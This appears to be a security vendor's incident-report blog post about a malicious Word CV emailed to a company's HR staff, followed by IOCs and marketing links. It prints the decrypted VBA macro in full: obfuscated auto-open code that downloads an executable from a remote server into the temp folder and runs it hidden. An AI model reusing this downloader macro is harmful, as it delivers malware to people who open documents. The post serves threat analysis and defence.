February 21, 2019

Incident Report: CV or Cyber Vector?

In this post we discuss how a cyber attack involving malicious macro code was disguised as a CV delivered via email.

Perception Point IR

Malicious Activity: Would You Hire a Hacker?

Would you? One of our client’s HR department received an email containing a CV. The email stated that the attached word document is password protected and provided the password inside the email. The user has to enter the password manually, a process that can cause issues to an automated system that check the file for malicious activity.

After the user enters the password the file becomes a common attack of a malicious macro code that executes malicious commands. The macro code is also encrypted making the detection even harder.

Perception Point’s file decryption feature that extracts the malicious code from an encrypted file. The code downloads a malicious exe to the temp folder from a server and activates it.

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim WinHttpReq As Object
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
    
WinHttpReq.Open "GET", "http://X.X.X.X/troll1.jpg", False, "username", "password"
WinHttpReq.send
Dim first5 As String
    Dim second5 As String
    Dim last5 As String
    first5 = ChrW(65) & ChrW(68) & ChrW(79) & ChrW(68) & ChrW(66) & ChrW(46) & ChrW(83) & ChrW(116) & ChrW(114) & ChrW(101)
    second5 = ChrW(97) & ChrW(109)
    last5 = first5 + second5
xyuhjnx = WinHttpReq.responseBody
If WinHttpReq.Status = 200 Then
    Set oStream = CreateObject(last5)
    oStream.Open
    oStream.Type = Val("1FFF")
    oStream.Write WinHttpReq.responseBody
    
    Dim first6 As String
    Dim last6 As String
    first6 = ChrW(92) & ChrW(99) & ChrW(104) & ChrW(101) & ChrW(99) & ChrW(107) & ChrW(46) & ChrW(101) & ChrW(120) & ChrW(101)
    last6 = first6
    
    oStream.SaveToFile Environ("Temp") + "\qwerty2.exe", Val("2FFF")
    oStream.Close
    
End If
 
Call Shell(Environ("Temp") + "\qwerty2.exe", 0)
End Sub

IOC’s

C2 Server IP - 209.141.55.226
qwerty2.exe - 2b5f43fdb4678f82874bbe424a60fde3ae547dd6697ef46d45febc17dfbef9b3 (SHA-256) VT score 12/69 2019-02-21 15:13:33 UTC

Learn more about how we protect our clients against malicious activity here.

Download the 2023 Gartner Market Guide for Email Security

TALK TO SALES

Ready to Try
Perception Point?

Learn More

What Goes “App” Could Take You Down

Files “are like a box of chocolates, you never know what you’re going to get”. In this blog, we cover the risks of malicious file uploads to web apps and the best practices to prevent them.

There’s Nothing “Meta” About Phishing for Credentials

There’s a new sophisticated phishing campaign making its rounds that aims to trick Facebook users into giving scammers their account credentials and PII by leveraging validation processes to seem credible.

3 Key Takeaways from the 2023 Gartner® Market Guide for Email Security

As email continues to be the primary vector for cyber attacks, staying up to date with the latest developments in email security is essential. In this blog post, we examine key insights from the latest Market Guide for Email Security Report by Gartner, and offer practical recommendations on how security and risk management leaders can fortify their security posture in 2023.

One for the Show, Two for the Money

Hundreds of legitimate websites are being used in two-step phishing attacks. Novel computer vision models can prevent them from reaching users’ inboxes.

Behind the Attack: Paradies Clipper Malware

In this blog we cover a new underground Clipper malware that allows attackers to replace a victim’s crypto wallet with their own.

Takeaways from the CircleCI Incident

Continuous integration and delivery platform CircleCI confirmed that a security incident occurred on January 04, 2023 and was caused by an infostealer being deployed on an employee’s laptop. Because the targeted employee had privileges to generate production access tokens, the attacker was able to potentially access and steal data from a subset of databases and stores.

Boston, USA

501 Boylston St, Floor 10
Boston, MA 02116
+1 (857) 278 4184

Tel Aviv, Israel

3 Rothschild St, Floor 6
Tel Aviv, Israel 6688106
+972 (3) 979 7011

Incident Report: CV or Cyber Vector?

Perception Point IR